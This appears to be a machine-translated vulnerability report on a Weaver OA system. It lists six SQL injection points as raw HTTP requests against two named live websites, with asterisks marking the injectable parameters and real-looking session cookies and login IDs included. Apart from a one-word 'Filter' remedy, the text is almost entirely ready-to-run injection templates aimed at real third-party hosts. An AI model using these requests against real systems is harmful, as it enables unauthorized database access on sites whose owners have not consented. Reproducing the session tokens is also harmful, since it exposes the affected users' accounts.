Package General SQL injection vulnerabilities in a weaver System (Full Version)
Tested Website: http://gl.triolion.com/& http://oaf.yitoa.com: 6688/
The version information is as follows:
Note: The following examples show that two SQL injections are general-purpose.
SQL Injection Vulnerability (6 in total)
1 # injection point 1
GET /homepage/Homepage.jsp?hpid=4*&subCompanyId=1&isfromportal=1&isfromhp=0 HTTP/1.1Accept: text/html, application/xhtml+xml, */*Referer: http://gl.triolion.com/wui/main.jsp?templateId=1Accept-Language: zh-CNUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)Accept-Encoding: gzip, deflateProxy-Connection: Keep-AliveDNT: 1Host: gl.triolion.comCookie: loginfileweaver=%2Flogin%2FLogin.jsp%3Flogintype%3D1%26gopage%3D; loginidweaver=489; languageidweaver=7; JSESSIONID=abckV1LU3qY1X8kdctsMu; testBanCookie=test
Another site also exists
GET /homepage/Homepage.jsp?hpid=21&subCompanyId=21&isfromhp=1&isfromportal=0&hastemplate= HTTP/1.1Accept: text/html, application/xhtml+xml, */*Referer: http://oaf.yitoa.com:6688/leftFrame.jspAccept-Language: zh-CNUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)Accept-Encoding: gzip, deflateProxy-Connection: Keep-AliveDNT: 1Host: oaf.yitoa.com:6688Cookie: loginfileweaver=/login/Login.jsp?logintype=1&gopage=; loginidweaver=1991; languageidweaver=7; iLeftMenuFrameWidth=134; testBanCookie=test; JSESSIONID=aZiM9tRkAEe4
2 # injection point 2
GET /page/element/7/News.jsp?ebaseid=7&eid=17*&styleid=1&hpid=4&subCompanyId=1&e71415018052369= HTTP/1.1Host: gl.triolion.comProxy-Connection: keep-aliveAccept: text/html, */*X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36Referer: http://gl.triolion.com/homepage/Homepage.jsp?hpid=4&subCompanyId=1&isfromportal=1&isfromhp=0&e71415018049673=Accept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2Cookie: testBanCookie=test; JSESSIONID=abc6T3nPyo20XcS2pP1Lu; loginfileweaver=%2Flogin%2FLogin.jsp%3Flogintype%3D1%26gopage%3D; loginidweaver=489; languageidweaver=7
Another site also exists
GET //page/element/7/News.jsp?ebaseid=7&eid=184*&styleid=template&hpid=21&subCompanyId=21 HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: zh-CNUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)Accept-Encoding: gzip, deflateHost: oaf.yitoa.com:6688DNT: 1Proxy-Connection: Keep-AliveCookie: loginfileweaver=/login/Login.jsp?logintype=1&gopage=; loginidweaver=1991; languageidweaver=7; iLeftMenuFrameWidth=134; testBanCookie=test; JSESSIONID=aZiM9tRkAEe4
3 # injection point 3
GET /CRM/data/ViewCustomerBase.jsp?requestid=-1*&isrequest=&CustomerID=11613 HTTP/1.1Accept: text/html, application/xhtml+xml, */*Referer: http://gl.triolion.com/CRM/data/ViewCustomer.jsp?CustomerID=11613*Accept-Language: zh-CNUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)Accept-Encoding: gzip, deflateProxy-Connection: Keep-AliveDNT: 1Host: gl.triolion.comCookie: loginfileweaver=%2Flogin%2FLogin.jsp%3Flogintype%3D1%26gopage%3D; loginidweaver=489; languageidweaver=7; JSESSIONID=abckV1LU3qY1X8kdctsMu; testBanCookie=test
4 # injection point 4
POST /page/element/compatible/view.jsp?ebaseid=9&eid=23*&styleid=1&hpid=4&subCompanyId=1&e71415018052423= HTTP/1.1Host: gl.triolion.comProxy-Connection: keep-aliveContent-Length: 0Accept: */*Origin: http://gl.triolion.comX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36Referer: http://gl.triolion.com/homepage/Homepage.jsp?hpid=4&subCompanyId=1&isfromportal=1&isfromhp=0&e71415018049673=Accept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2Cookie: testBanCookie=test; JSESSIONID=abc6T3nPyo20XcS2pP1Lu; loginfileweaver=%2Flogin%2FLogin.jsp%3Flogintype%3D1%26gopage%3D; loginidweaver=489; languageidweaver=7
5 # injection point 5
GET /page/element/Weather/View.jsp?ebaseid=weather&eid=5*&styleid=1'&hpid=4'&subCompanyId=1'&e71415018052415=' HTTP/1.1Host: gl.triolion.comProxy-Connection: keep-aliveAccept: text/html, */*X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36Referer: http://gl.triolion.com/homepage/Homepage.jsp?hpid=4&subCompanyId=1&isfromportal=1&isfromhp=0&e71415018049673=Accept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2Cookie: testBanCookie=test; JSESSIONID=abc6T3nPyo20XcS2pP1Lu; loginfileweaver=%2Flogin%2FLogin.jsp%3Flogintype%3D1%26gopage%3D; loginidweaver=489; languageidweaver=7
6 # injection point 6
GET /proj/data/ViewProject.jsp?ProjID=56* HTTP/1.1Accept: text/html, application/xhtml+xml, */*Referer: http://gl.triolion.com/proj/search/searchtask.jsp?e71415500119375=Accept-Language: zh-CNUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)Accept-Encoding: gzip, deflateProxy-Connection: Keep-AliveDNT: 1Host: gl.triolion.comCookie: loginfileweaver=%2Flogin%2FLogin.jsp%3Flogintype%3D1%26gopage%3D; loginidweaver=489; languageidweaver=7; JSESSIONID=abckV1LU3qY1X8kdctsMu; testBanCookie=test
Solution:
Filter